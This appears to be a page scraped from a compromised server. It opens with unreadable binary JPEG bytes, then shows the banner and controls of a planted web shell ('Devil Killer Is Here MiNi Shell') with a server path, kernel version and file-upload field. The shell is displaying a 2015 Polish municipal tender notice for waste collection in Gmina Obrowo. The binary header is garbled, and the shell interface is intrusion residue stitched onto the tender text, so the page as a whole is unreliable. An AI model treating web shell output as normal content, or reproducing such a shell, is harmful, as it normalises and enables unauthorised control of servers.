JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150713/174756-N-2015.html

<p class="kh_header"><b>Obrowo: Usługa odbioru i zagospodarowania odpadów komunalnych 
z posesji zamieszkałych i niezamieszkałych, położonych na terenie Gminy Obrowo</b><br>
<b>Numer ogłoszenia: 174756 - 2015; data zamieszczenia: 13.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Obrowo , Aleja Lipowa 27, 87-126 Obrowo, woj. kujawsko-pomorskie, tel. 56 6786022, faks 56 6786022 w. 135.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.obrowo.pl, www.bip.obrowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa odbioru i zagospodarowania odpadów komunalnych 
z posesji zamieszkałych i niezamieszkałych, położonych na terenie Gminy Obrowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Rodzaj zamówienia: usługa. 
2.	Przedmiot zamówienia: Usługa odbioru i zagospodarowania odpadów komunalnych z posesji zamieszkałych i niezamieszkałych, położonych na terenie Gminy Obrowo zgodnie z nomenklaturą CPV: 
90.51.31.00-7 - usługi wywozu odpadów pochodzących z gospodarstw domowych
90.51.00.00-2 - usuwanie i obróbka odpadów
90.51.20.00-9 - usługi transportu odpadów
90.51.40.00-3 - usługi recyklingu odpadów
90.53.30.00-2 - usługi zagospodarowania odpadów
34.92.84.80-6 - pojemniki i kosze na odpady i śmieci
3. Zakres zamówienia obejmuje wykonanie usługi na terenie Gminy Obrowo, polegającej na
        odbiorze z lokalizacji wskazanych przez Zamawiającego zmieszanych oraz selektywnie
        zebranych odpadów pochodzących z nieruchomości stanowiących własność właścicieli
        nieruchomości oraz użytkowników lokali będących własnością innych osób, które są wymienione
        w załączniku nr 4 do umowy oraz transporcie odpadów do regionalnej instalacji do przetwarzania
       odpadów. 
4.	 Przedmiot zamówienia jest zgodny z definicją odpadów komunalnych określoną 
 w art. 3 ust. 1 pkt. 7 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r.
 poz. 21.) 
5.	Odpady objęte przedmiotem zamówienia przeznaczone do odbioru zostały sklasyfikowane zgodnie z Rozporządzeniem Ministra Środowiska z dnia 27 września 2001 r. w sprawie katalogu odpadów (Dz. U. z 2001 r. Nr 112, poz. 1206 ze zm.) i mieszczą się w grupie oznaczonej kodem: 20 - odpady komunalne łącznie z frakcjami gromadzonymi selektywnie i 15 - odpady opakowaniowe, 17 - odpady budowlane i rozbiórkowe pochodzące z prowadzenia drobnych prac nie wymagających pozwolenia na budowę ani zgłoszenia zamiaru budowy lub wykonania robót.
6. Charakterystyka gminy:
6.1. Liczba mieszkańców zameldowanych na pobyt stały i czasowy, wg stanu na dzień
              30.06.2015 r. wyniosła 15.104 osoby.6.2.	Szacowana ilość gospodarstw domowych w zabudowie zwartej w miejscowościach położonych na terenie gminy:
1) Brzozówka           - 540
         2) Dobrzejewice        - 196
         3) Dzikowo               - 169
         4) Głogowo               - 633
5) Kawęczyn            - 172
6) Kazimierzewo      -  17
7) Kuźniki                -   23
8) Łążyn II               - 157
9) Łążynek               -   80
10)  Łęg-Osiek          -  23
11) Obory                  -  69
12) Obrowo               - 427
13) Osiek nad Wisłą  - 431
14) Sąsieczno            - 129
15) Silno                    - 276
16) Skrzypkowo        -   67
17) Smogorzewiec     -  40
18) Stajenczynki        -  92
19) Szembekowo       - 221
20) Zawały                - 175
21) Zębowo               - 145
22) Zębówiec             -   66 
Razem                        4.148
6.3. Szacowana ilość gospodarstw domowych w zabudowie rozproszonej na terenie gminy 
          w miejscowościach:
1) Dzikowo              - 40
2) Łęg-Osiek            - 20
3) Obory                  - 20
4) Silno                    - 40
5) Smogorzewiec    -  30
6) Stajenczynki        - 25 
7) Skrzypkowo        -  20
8) Szembekowo      -  20
Razem                       215          
6.4. Szacowana ilość gospodarstw domowych z utrudnionym (nawierzchnia i szerokość 
           drogi) dojazdem specjalistycznymi pojazdami bezpylnymi o pojemności 20-22 m3 
           i większych - 10 %.
6.4.1. Szacowana ilość podmiotów gospodarczych - ok. 140 podmiotów.   
6.5. Powierzchnia gminy 162 km2. 
6.6. Szacowana ilość odpadów w 2015 r. 5.000 Mg.
7. Wykonawca podczas realizacji przedmiotu umowy zobowiązany jest do osiągnięcia 
          odpowiednich poziomów recyklingu odbieranych odpadów komunalnych zgodnie z art. 3b 
         i 3c ustawy o utrzymaniu czystości i porządku w gminach oraz rozporządzeniami 
         określonymi w pkt. 3.26. ppkt. 11 i 13 SIWZ.
8. Wykonawca zobowiązany jest do dostarczenia na własny koszt, właścicielom nieruchomości
         zamieszkałych (na czas realizacji zamówienia) pojemników:
8.1.O pojemności 120 l lub 240 l do zbierania odpadów (maksymalnie dwa pojemniki o tej
                samej pojemności na jedno gospodarstwo do odpadów zmieszanych) w terminie max. 5 dni
                od daty zgłoszenia.
                Pojemniki wstawiane będą  bez dodatkowej opłaty, wg zapotrzebowań złożonych do Gminy
przez właścicieli poszczególnych nieruchomości w zabudowie jednorodzinnej.
8.2.O pojemności do 1,1 m3 do zbierania odpadów zmieszanych z posesji niezamieszkałych
                w terminie max. 5 dni od daty zgłoszenia.
               Pojemniki wstawiane będą bez dodatkowej opłaty, wg zapotrzebowań złożonych do Gminy przez właścicieli nieruchomości, podmioty prowadzące działalność gospodarczą, placówki oświatowe, OSP, według szacunkowego podziału na pojemniki:
                     - ok. 40 pojemników 120 l,
                     - ok. 60 pojemników 240 l,
                     - ok. 40 pojemników 1100 l.
8.3. O pojemności min. 6,5 m3  do zbierania odpadów zmieszanych z niezamieszkałych
                   posesji:
                a) przy cmentarzach w miejscowościach: 
                   1) Dobrzejewice - 1 pojemnik,              
                   2) Obrowo - 1 pojemnik,
                   3) Osiek nad Wisłą - 1 pojemnik,
                   4) Łążyn II - 1 pojemnik,
                   5) oczyszczalnia ścieków Dobrzejewice - 1 pojemnik,
                b) inne lokalizacje:
                    1) Dom Kombatanta w Dobrzejewicach - 1 pojemnik o pojemności 7,3 m3
Uwaga! 
Segregacja odpadów z posesji niezamieszkałych będzie realizowana bezpośrednio do PSZOK 
w Dobrzejewicach.

9. Do zbierania zmieszanych odpadów komunalnych mogą być stosowane pojemniki metalowe
       i z tworzywa sztucznego przystosowane do opróżniania mechanicznego o pojemnościach
       określonych w regulaminie utrzymania czystości i porządku w gminie Obrowo.10. Pojemniki, o których mowa w pkt. 3.8. powinny mieć kolor zielony w przypadku pojemników 
       z tworzywa sztucznego dla odpadów zmieszanych. Pojemniki metalowe do odpadów zmieszanych
       mogą być pomalowane na zielono lub ocynkowane. Do zbierania bioodpadów i odpadów
       zielonych wykonawca zastosuje pojemniki w kolorze brązowym z opisem BIOODPADY. 
       Dopuszcza się na pojemnikach również logo wykonawcy.
11. Jeżeli podczas odbierania odpadów dojdzie do uszkodzenia lub zniszczenia pojemników
        z winy wykonawcy, wykonawca zobowiązany będzie do wymiany uszkodzonego pojemnika na
       własny koszt. W przypadku uszkodzenia lub zniszczenia pojemnika z winy właściciela
        nieruchomości, wykonawca dostarczy pojemnik nowy w ramach usługi dodatkowej.12. Za szkody powstałe w majątku Zamawiającego lub osób trzecich spowodowane przez
          wykonawcę w trakcie odbioru odpadów, odpowiedzialność ponosi Wykonawca.
13. Odbiór i wywóz odpadów komunalnych z terenu posesji zamieszkałych wykonawca będzie
          realizował zawsze w ten sam dzień roboczy tygodnia, wg stałego harmonogramu. Przy zmianie
          harmonogramu wywozu Wykonawca zobowiązany jest do poinformowania Zamawiającego 
          z miesięcznym wyprzedzeniem oraz przekazaniem nowego harmonogramu wywozu
          mieszkańcom.
          W sytuacji, gdy dzień wywozu jest ustawowo dniem wolnym od pracy (święto), wywóz
          odpadów nastąpi w pierwszym dniu roboczym po dniu wolnym lub przesunie się o jeden dzień.
14. Wykonawca zobowiązany będzie do odbioru wszystkich odpadów przygotowanych do 
          wywozu z terenu posesji zamieszkałej, pod warunkiem zgromadzenia ich, przez właściciela 
          tej nieruchomości, w odpowiednich pojemnikach lub workach. Wykonawca będzie 
          zobowiązany również do zebrania odpadów leżących obok pojemników (segregowanych lub
          mieszanych komunalnych), jeżeli jest to skutkiem jego działania. 
15. Odbiór i wywóz odpadów komunalnych wykonawca będzie realizował z częstotliwością i na
          zasadach określonych w uchwale Rady Gminy Obrowo w sprawie określenia szczegółowego
         sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od
         właścicieli nieruchomości z terenu Gminy Obrowo i zagospodarowania tych odpadów, 
         w zamian za uiszczoną opłatę za gospodarowanie odpadami komunalnymi.
15.1. Wywóz bioodpadów w zabudowie zwartej będzie się odbywał co 2 tygodnie w okresie od
                 sierpnia do końca października. 
16. Wywóz zebranych odpadów komunalnych wykonawca będzie realizował do Regionalnej
          Instalacji Przetwarzania Odpadów Komunalnych w Toruniu na ul. Kociewskiej 37/53.
17. Wykonawca do 1 sierpnia 2015 r. dostarczy do Punktu Selektywnej Zbiórki Odpadów
         Komunalnych (PSZOK) usytuowanego na terenie oczyszczalni ścieków w Dobrzejewicach 
         pojemniki, w których będą gromadzone segregowane odpady.
         Wykonawca będzie realizował wywóz odpadów z PSZOK w czasie do 48 godz., w dni 
  robocze, po otrzymaniu informacji pisemnej (e-mail, fax, listownie) od pracownika
  obsługującego ten punkt o konieczności zrealizowania usługi.
        Wykonawca w miejscu przygotowanym przez Zamawiającego ustawi pojemniki zgodnie z poniższym wykazem: 
17.1. Pojemniki - kontenery zamykane od góry o pojemności min. 6,5 m3 w ilości 2 szt.     
                    Każdy pojemnik odrębnie opisany z podziałem na poszczególne frakcje odpadów 
                    (papier, tworzywa sztuczne).
17.2. Pojemniki - kontenery otwarte o pojemności min. 6,5 m3 w ilości 4 szt. Każdy pojemnik
                    odrębnie opisany z podziałem na poszczególne frakcje odpadów (metale, szkło, odpady
                    ulegające biodegradacji, budowlane i remontowe).
17.3. Pojemniki kontenery (mogą być siatkowe) o pojemności min. 5,0 m3 w ilości  3 szt.
                    Każdy pojemnik odrębnie opisany z podziałem na poszczególne frakcje odpadów
                    (opony, elektryczne i elektroniczne, wielkogabarytowe).
17.4. Specjalistyczne pojemniki - kontenery magazynowe, na odpady niebezpieczne 
                     o pojemności min. 1,1 m3 w ilości 2 szt. opisane z podziałem na poszczególne frakcje
                     odpadów (środki chemiczne, farby i lakiery oraz akumulatory).
17.5.  Pojemnik zamykany od góry o pojemności min. 1,1 m3 na świetlówki.
17.6.  Pojemnik zamykany od góry o pojemności min. 1,1 m3 na tekstylia. 
17.7.  Pojemniki zamykane od góry o pojemności min. 240 l, w ilości 2 szt. z przeznaczeniem
                     na przeterminowane lekarstwa i zużyte baterie.
               Wykonawca zobowiązany będzie do dostarczenia do PSZOK pojemników czystych, po
                ich opróżnieniu.
   Pojemniki powinny być czyste zarówno w środku jak i na zewnątrz. Dodatkowo
   pojemniki powinny posiadać czytelny opis ich przeznaczenia (właściwy odpad) oraz
   powinny być estetycznie pomalowane.
18. Wykonawca zobowiązany będzie dodatkowo dostarczyć i ustawić, we wskazanych przez
          Zamawiającego punktach, pojemniki do zbierania przeterminowanych lekarstw i zużytych
           baterii oraz akumulatorów małogabarytowych, a także punkty te oznaczyć za pomocą tabliczek
          informacyjnych. 
19. Wykonawca będzie zobowiązany, po otrzymaniu informacji od pracownika odebrać, 
            a następnie wywieźć odpady opisane w pkt. 3.18, w terminie do max. 5 dni roboczych od
            otrzymania zawiadomienia.
20. Wykonawca w ramach realizacji umowy nie będzie mógł mieszać selektywnie zebranych 
          odpadów komunalnych z niesegregowanymi odpadami.
21.	Wykonawca zobowiązany będzie do monitorowania ciążącego na właścicielu nieruchomości 
            obowiązku segregowania odpadów komunalnych.
            W przypadku stwierdzenia, że właściciel nieruchomości nie wywiązuje się z obowiązku
 segregacji odpadów, wykonawca odbiera odpady jako zmieszane przy najbliższym opróżnianiu pojemników do gromadzenia odpadów komunalnych, wynikającym z wykazu częstotliwości wywozu odpadów. W takim przypadku wykonawca umieszcza na pokrywie pojemnika znacznik (np. samoprzylepna kartka) w kolorze żółtym informujący właściciela nieruchomości o otrzymaniu ostrzeżenia.
22.	O zaistniałej sytuacji wykonawca zawiadomi Zamawiającego drogą elektroniczną, fax. lub 
pisemnie, w terminie do 2 dni roboczych. Do zawiadomienia wykonawca dołączy   
protokół określający: dzień wywozu, miejscowość, ulicę i numer posesji oraz krótki opis 
obrazujący podstawę udzielenia ostrzeżenia właścicielowi nieruchomości. Do protokołu 
wskazane jest dołączenie również zdjęcia.
23.	Rzetelność wywiązywania się wykonawcy z obowiązku określonego w pkt. 20. i 21.  będzie poddawana przez Zamawiającego okresowym kontrolom, które w zależności od 
 stopnia uchybień będą stanowiły o wysokości kar umownych, o których mowa w załączniku 
 do SIWZ (wzór umowy).
24.	Dla potrzeb selektywnego zbierania odpadów komunalnych, wykonawca do dnia 
01.08.2015 r. dostarczy właścicielowi nieruchomości według wykazu przekazanego przez Zamawiającego po komplecie worków:
1)	5 szt. w kolorze żółtym na odpady segregowane suche (pojemność 110 litrów/szt.)
2)	2 szt. w kolorze białym na szkło (pojemność 60 litrów/szt.)
           (Worki powinny być przekazane tylko osobom, które zadeklarują chęć segregowania
           odpadów).
           Worki do segregowanych odpadów powinny być odpowiednio opisane, tj. oznaczenie rodzaju
           odpadu wraz z logiem Wykonawcy.
           Wykonawca wywożąc odpady w workach przekazuje mieszkańcom ilość worków nowych,
            równą ilości worków odebranych, chyba że właściciel nieruchomości zgłosił potrzebę większej
           ilości worków (jednorazowo max. dodatkowo 3 szt.).
25.	Wykonawca zobowiązany będzie do prowadzenia i przekazania Zamawiającemu dokumentacji związanej z przedmiotem zamówienia:
25.1.	Informacji, o których mowa w pkt. 21. SIWZ.
25.2.	Raport na koniec IV kwartału 2015 r. o ilości i rodzaju pojemników znajdujących się na poszczególnych nieruchomościach.
25.3.	Sprawozdań, o których mowa w art. 9n ustawy o utrzymaniu czystości i porządku 
w gminach.
25.4.	Innych informacji na temat odbioru, unieszkodliwiania i segregacji odpadów, jeżeli 
w trakcie realizacji zamówienia został na Zamawiającego nałożony taki obowiązek. 
             Obowiązek ten dotyczy informacji, w posiadaniu których będzie wykonawca.
25.5.	Jako załączniki do faktury miesięcznej wykonawca musi załączyć karty przekazania odpadów uwzględniające datę, kod, rodzaj, wagę przekazanych odpadów komunalnych do RIPOK. karty przekazania odpadów, o których mowa w zdaniu poprzednim muszą jednoznacznie stwierdzać, że odpady pochodzą z terenu gminy Obrowo.
25.6.	Sprawozdań z działań określonych w pkt. 32 i 34 w terminach odpowiednio do 15 sierpnia 2015 r. i w terminie do 31.12 danego roku.
26. Odbiór odpadów komunalnych wykonawca będzie świadczył zgodnie z przepisami, 
         a w szczególności:
        1)	ustawa z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2008 r., Nr 
     	25, poz. 150 ze zm.),
        2)	ustawa z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.   
   	U. z 2012, poz. 391 ze zm.),
        3) 	ustawa z dnia 21 kwietnia 2001 r. o odpadach (Dz. U. z 2010 r. Nr 185, poz. 1243 ze zm.),
        4) 	ustawa z dnia 29 stycznia 2004  r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113,
            poz. 759 ze zm.),
        5)	ustawa z dnia 29 lipca 2005 o zużytym sprzęcie elektrycznym i elektronicznym (Dz. U. z
            2005r., Nr 180, poz. 1495 ze zm.), 
        6) 	ustawa z dnia 24 kwietnia 2009 r. o bateriach i akumulatorach (Dz. U. z 2009 r., Nr 79, poz.
            666 ze zm.),
        7) 	ustawa z dnia 18 lipca 2001 r. Prawo wodne (Dz. U. z 2012 r., poz. 145),
        8) 	rozporządzenie Ministra Środowiska z dnia 8 grudnia 2010 r. w sprawie wzoru dokumentów
            stosowanych na potrzeby ewidencji odpadów (Dz. U. z 2010 r. Nr 249, poz. 1673 ze zm.),
        9) 	rozporządzenie Ministra Środowiska z dnia 8 grudnia 2010 r. w sprawie zakresu informacji
             oraz wzorów formularzy służących do sporządzania i przekazywania zbiorowych zestawień
            danych o odpadach (Dz. U. z 2010 r., Nr 249, poz.1674 ze zm.),
      10) rozporządzenie Ministra Środowiska z dnia 27 września 2001 r. w sprawie katalogu odpadów
            (Dz. U. z 2001, Nr 112, poz. 1206 ze zm.),
     11) 	rozporządzenie Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu,
             przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów
            komunalnych (Dz. U. z 2012 r., poz. 645),
     12) 	rozporządzenie Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań 
             o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji
            zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r., poz. 630),
     13)	rozporządzenie Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów
            ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do
            składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów (Dz. U. z
           2012 r., poz. 676),
     14) 	uchwała Nr XXVI/434/12 Sejmiku Województwa Kujawsko - Pomorskiego z dnia 24
            września 2012 r. w sprawie uchwalenia Planu gospodarki odpadami województwa kujawsko -
           pomorskiego na lata 2012 - 2017 z perspektywą na lata 2018 - 2023 (Dz. Urz. Woj. Kuj.- Pom.
          z 2012 r. poz. 2028),
     15)	uchwała Nr XXVI/435/12 Sejmiku Województwa Kujawsko - Pomorskiego z dnia 24
             września 2012 r. w sprawie wykonania Planu gospodarki odpadami województwa kujawsko -
            pomorskiego na lata 2012 - 2017 z perspektywą na lata 2018 - 2023 (Dz. Urz. Woj. Kuj.-
           Pom. z 2012 r. poz. 2028),
      16) 	uchwała Nr XXII/141/2012 Rady Gminy Obrowo z dnia 28.12.2012 r. w sprawie
            szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów
            komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, 
      17) 	uchwała Nr XXII/142/2012 Rady Gminy Obrowo  w sprawie wyboru metody i ustalenia
            opłaty za gospodarowanie odpadami komunalnymi oraz stawki opłaty,
       18) uchwała Nr XXII/143/2012 Rady Gminy Obrowo z dnia 28.12.2012 r. w sprawie odbierania
             odpadów komunalnych od właścicieli nieruchomości, na których nie zamieszkują mieszkańcy
            a powstają odpady komunalne,
       19) uchwała Nr XXV/161/2013 Rady Gminy Obrowo z dnia 27.03.2013 r. w sprawie ustalenia
            regulaminu utrzymania czystości i porządku na terenie Gminy Obrowo,
       20) uchwała Nr XXV/162/2013 Rady Gminy Obrowo z dnia 27.03.2013 r. w sprawie wyboru
             metody i ustalenia opłaty za gospodarowanie odpadami komunalnymi oraz stawki opłaty,
       21) uchwała Nr XXVI/172/2013 Rady Gminy Obrowo z dnia 24.04.2013 r. w sprawie określenia
            rodzajów usług dodatkowych świadczonych przez Gminę Obrowo w zakresie odbierania
             odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów oraz
            wysokości cen za te usługi,
      22) uchwała Nr VII/44/2015 Rady Gminy Obrowo z dnia 20.05.2015 r. w sprawie ustalenia
             regulaminu utrzymania czystości i porządku na terenie Gminy Obrowo.   
27. Do realizacji przedmiotu zamówienia wykonawca powinien zastosować:
     27.1. Samochody bezpylne do wywozu zmieszanych i segregowanych odpadów o ładowności powyżej 9 Mg (pojemność min. 20 m3) w ilości min. 3 szt.
27.2.	Samochody bezpylne do wywozu segregowanych odpadów o ładowności powyżej 5 Mg (pojemność min. 15 m3) - w ilości min. 3 szt.
27.3.	Samochody do wywozu odpadów ulegających biodegradacji (mokrych) z wanną odciekową, o ładowności powyżej 9 Mg (pojemności min. 20  m3) - w ilości min. 1 szt. 
27.4.	Samochody hakowe o dopuszczalnej ładowności min. 12 Mg przystosowane do odbioru odpadów budowlanych w kontenerach o pojemności 9,5 m3 i większych - w ilości min. 1 szt.
27.5.	Samochody hakowe o dopuszczalnej ładowności min. 5 Mg przystosowane do odbioru odpadów zebranych w kontenerach o pojemności 5,0 m3 i większych - w ilości min. 1 szt.
27.6.	Myjka do pojemników o zamkniętym obiegu wody, przystosowana do mycia i dezynfekcji pojemników w miejscu odbioru odpadów- w ilości min. 1 szt.
27.7.	Samochód dostawczy o ładowności ca 1 Mg z systemem załadunku pojemników od 120 l do 240 l.
27.8.	Samochód dostawczy - w ilości min. 1 szt.

Uwaga! - wykonawca musi swoimi pojazdami zapewnić wykonanie usług wywozu odpadów
                 komunalnych, w wymaganych terminach bez względu na warunki pogodowe 
                 i terenowe.
28. Pojazdy muszą być zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz 
          odpadów podczas ich załadunku i transportu.
29. Pojazdy muszą być trwale i czytelnie oznakowane w widocznym miejscu nazwą firmy oraz 
        danymi adresowymi i numerem telefonu.
30. Pojazdy muszą być wyposażone w:
     30.1. Urządzenia do uprzątnięcia miejsca po opróżnieniu  pojemnika.
     30.2.Monitoring bazujący na systemie pozycjonowania satelitarnego, umożliwiający                      
    trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu 
    i miejscach postojów.
     30.3. Czujniki zapisujące dane o miejscach wyładunku odpadów.
	    Zamawiający dopuszcza wyposażanie pojazdów w urządzenia do ważenia odpadów 
                 komunalnych.
31. Baza magazynowo - transportowa:
     31.1.W celu zapewnienia prawidłowości wykonywania usług wykonawca będzie dysponował
                 bazą magazynowo - transportową usytuowaną na terenie gminy Obrowo, bądź w odległości
                 nie większej niż 60 km od granic administracyjnych gminy (odległość liczona po głównych
                drogach dojazdowych), zgodnie z Rozporządzeniem Ministra Środowiska z dnia 11 stycznia
               2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych
             od właścicieli nieruchomości (Dz. U. z 2013 r. poz. 122 ze zm.).  
     31.2. Baza musi być zlokalizowana na terenie, do którego wykonawca posiada tytuł prawny.
    31.3. Teren bazy musi być:
           1) Zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym. 
            2)Wyposażony w miejsca przeznaczone do parkowania pojazdów - zabezpieczone przed
                emisją zanieczyszczeń do gruntu.
            3)Wyposażony w miejsca magazynowania selektywnie zebranych odpadów komunalnych.
              Miejsca te muszą być zabezpieczone przed emisją zanieczyszczeń do gruntu oraz
              zabezpieczone przed działaniem czynników atmosferycznych.
           4)Wyposażony w urządzenia lub systemy zapewniające zagospodarowanie wód
              opadowych i ścieków przemysłowych, pochodzących z terenu bazy, zgodnie z wymaganiami
             określonymi przepisami ustawy z dnia 18 lipca 2001 r. - Prawo wodne.
           5) Wyposażony w miejsca przeznaczone do parkowania pojazdów.
           6)Wyposażony w pomieszczenia socjalne dla pracowników, odpowiadające ilości
              zatrudnionych osób.
           7) Wyposażony w punkt bieżącej konserwacji pojazdów.
           8)Wyposażony w miejsca do mycia i dezynfekcji pojazdów.
